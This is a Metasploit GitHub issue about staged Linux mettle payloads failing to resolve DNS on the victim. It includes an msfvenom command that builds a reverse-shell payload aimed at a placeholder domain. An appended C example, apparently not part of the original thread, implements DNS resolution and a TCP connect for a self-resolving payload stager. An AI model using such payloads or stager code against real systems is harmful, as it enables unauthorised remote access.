rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

staged mettle, meterpreter and other Linux shellcode cannot resolve dns in victim #8264

Closed huxinyi718 closed 7 years ago

huxinyi718 commented 7 years ago

Steps to reproduce

  1. msfvenom -p linux/mipsle/mettle/reverse_tcp LHOST=example.domain LPORT=4444 -f elf -o /tmp/elf

Expected behavior

It should start a reverse shell to the domain.

Current behavior

mettle exit with "Segmentation fault"

I ran tcpdump on port 53 on the victim, but nothing.

System stuff

Metasploit version

4.14.10-dev

I installed Metasploit with:

OS

Kali2

busterb commented 7 years ago

Please try the stageless version instead, which will do DNS resolution: linux/mipsle/mettle_reverse_tcp

The staged version does not do DNS resolution because that's how the stager works - it is minimal shellcode to load the main stage, and in this case Metasploit will try to do the DNS resolution itself and embed the IP address instead. Changing this requires a change to the general stager shellcode, and would be best to do across all architectures if possible. It's not a mettle-specific problem; almost all of our staged Linux shellcode works the same way.

huxinyi718 commented 7 years ago

Yes. The stageless payload works well. But are there any easy ways to make staged mettle do the DNS resolution?

busterb commented 7 years ago

Easy is relative. We could make a script-based stager that uses python, perl, php, or shell (wget/curl) to do the injection. That's pretty much what the command stagers do already.

If you want a native shellcode blob suitable for using in a BoF, etc, someone just needs to write the shellcode for it. Add a couple of syscalls for doing the name resolution, and some struct manipulation. Are you still going to be dropping a stager executable, or are you taking advantage of memory corruption?
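The two comments above describe the gap: the staged stager carries an IPv4 address that msfvenom resolved on the attacker's side, so the victim never sends a DNS query, and closing it natively means adding the name-resolution syscalls and packet structs to the stager. The following is an added example, not code from Metasploit or mettle, of the minimal pieces such a stager would need: a hand-built A-record query, a bounds-checked answer parser, and the UDP-query-then-TCP-connect path, using only socket syscalls and no libc resolver so the same logic could be ported to shellcode. The hostname example.domain is taken from the report; the transaction ID 0x1337, the resolver argument, the 3-second timeout and the constructed sample reply are assumptions for illustration.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <unistd.h>

/* Encode a recursive A/IN query for `name` into buf; returns its length or -1. */
int dns_build_query(const char *name, uint16_t txid, uint8_t *buf, size_t cap) {
    size_t n = strlen(name), p = 12;
    if (cap < 12 + n + 2 + 4) return -1;        /* header + qname + qtype/qclass */
    memset(buf, 0, 12);
    buf[0] = (uint8_t)(txid >> 8); buf[1] = (uint8_t)txid;
    buf[2] = 0x01;                              /* RD: let the resolver recurse */
    buf[5] = 0x01;                              /* QDCOUNT = 1 */
    for (const char *s = name;;) {              /* "a.b" -> \1a\1b\0 */
        const char *dot = strchr(s, '.');
        size_t len = dot ? (size_t)(dot - s) : strlen(s);
        if (len == 0 || len > 63) return -1;
        buf[p++] = (uint8_t)len;
        memcpy(buf + p, s, len);
        p += len;
        if (!dot) break;
        s = dot + 1;
    }
    buf[p++] = 0;
    buf[p++] = 0; buf[p++] = 1;                 /* QTYPE  = A  */
    buf[p++] = 0; buf[p++] = 1;                 /* QCLASS = IN */
    return (int)p;
}

/* Step over a name (labels or a 0xC0 compression pointer); new offset or -1. */
static int dns_skip_name(const uint8_t *rsp, size_t len, size_t p) {
    while (p < len) {
        if (rsp[p] == 0) return (int)p + 1;
        if ((rsp[p] & 0xc0) == 0xc0) return (int)p + 2;
        p += 1 + rsp[p];
    }
    return -1;
}

/* Pull the first A record out of a reply. Every offset is bounds-checked because
 * the bytes come off the wire. Writes the address in network byte order to *ip
 * (may be NULL); returns 0 on success, -1 otherwise. */
int dns_parse_a(const uint8_t *rsp, size_t len, uint16_t txid, uint32_t *ip) {
    if (len < 12 || ((rsp[0] << 8) | rsp[1]) != txid) return -1;  /* not ours */
    if (!(rsp[2] & 0x80) || (rsp[3] & 0x0f) != 0) return -1;      /* QR, RCODE */
    uint16_t qd = (uint16_t)((rsp[4] << 8) | rsp[5]);
    uint16_t an = (uint16_t)((rsp[6] << 8) | rsp[7]);
    int p = 12;
    for (uint16_t i = 0; i < qd; i++) {          /* skip the echoed question */
        if ((p = dns_skip_name(rsp, len, (size_t)p)) < 0 || (size_t)p + 4 > len) return -1;
        p += 4;
    }
    for (uint16_t i = 0; i < an; i++) {          /* walk the answer RRs */
        if ((p = dns_skip_name(rsp, len, (size_t)p)) < 0 || (size_t)p + 10 > len) return -1;
        uint16_t type  = (uint16_t)((rsp[p] << 8) | rsp[p + 1]);
        uint16_t rdlen = (uint16_t)((rsp[p + 8] << 8) | rsp[p + 9]);
        p += 10;
        if ((size_t)p + rdlen > len) return -1;
        if (type == 1 && rdlen == 4) { if (ip) memcpy(ip, rsp + p, 4); return 0; }
        p += rdlen;                              /* CNAME, AAAA etc.: skip */
    }
    return -1;
}

/* Run-time path a self-resolving stager would take: UDP query, parse, then TCP
 * connect to the answer. Returns the connected fd (the stage would then be read
 * from it, exactly as the hard-coded-IP stager does) or -1. Needs a network. */
int resolve_and_connect(const char *name, const char *resolver, uint16_t port) {
    uint8_t q[512], r[512];
    uint32_t ip;
    int qlen = dns_build_query(name, 0x1337, q, sizeof q);   /* txid: assumed */
    if (qlen < 0) return -1;
    int us = socket(AF_INET, SOCK_DGRAM, 0);
    struct timeval tv = { 3, 0 };                /* don't hang on a dead resolver */
    setsockopt(us, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    struct sockaddr_in ra = { .sin_family = AF_INET, .sin_port = htons(53) };
    inet_pton(AF_INET, resolver, &ra.sin_addr);
    sendto(us, q, (size_t)qlen, 0, (struct sockaddr *)&ra, sizeof ra);
    ssize_t rlen = recvfrom(us, r, sizeof r, 0, NULL, NULL);
    close(us);
    if (rlen < 0 || dns_parse_a(r, (size_t)rlen, 0x1337, &ip) < 0) return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    sa.sin_addr.s_addr = ip;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) { close(fd); return -1; }
    return fd;
}

/* Constructed sample reply (not captured traffic): txid 0x1337, flags 0x8180,
 * the echoed question, one A/IN answer via pointer 0xC00C, TTL 60, 10.0.0.5. */
static const uint8_t SAMPLE_RESPONSE[] = {
    0x13,0x37, 0x81,0x80, 0x00,0x01, 0x00,0x01, 0x00,0x00, 0x00,0x00,
    7,'e','x','a','m','p','l','e', 6,'d','o','m','a','i','n', 0, 0x00,0x01, 0x00,0x01,
    0xc0,0x0c, 0x00,0x01, 0x00,0x01, 0x00,0x00,0x00,0x3c, 0x00,0x04, 10,0,0,5,
};

/* Offline checks: the encoder's question section must equal the sample reply's
 * (returns the 32-byte query length, or -1), and the parser must yield 10.0.0.5
 * (host-order 0x0a000005, or 0 on failure). */
int demo_build_query(void) {
    uint8_t q[64];
    int n = dns_build_query("example.domain", 0x1337, q, sizeof q);
    return (n == 32 && memcmp(q + 12, SAMPLE_RESPONSE + 12, 20) == 0) ? n : -1;
}
uint32_t demo_parse_sample(void) {
    uint32_t ip;
    if (dns_parse_a(SAMPLE_RESPONSE, sizeof SAMPLE_RESPONSE, 0x1337, &ip) < 0) return 0;
    return ntohl(ip);
}
```

The point of writing it this way is that every call maps to one syscall (socket, setsockopt, sendto, recvfrom, close, connect) plus byte shuffling, which is the "couple of syscalls and some struct manipulation" a native stager would have to carry; the parser's length checks are not optional, since a stager that trusts rdlen or a compression pointer from an attacker-controlled resolver hands out the same class of crash the report describes, only remotely triggered.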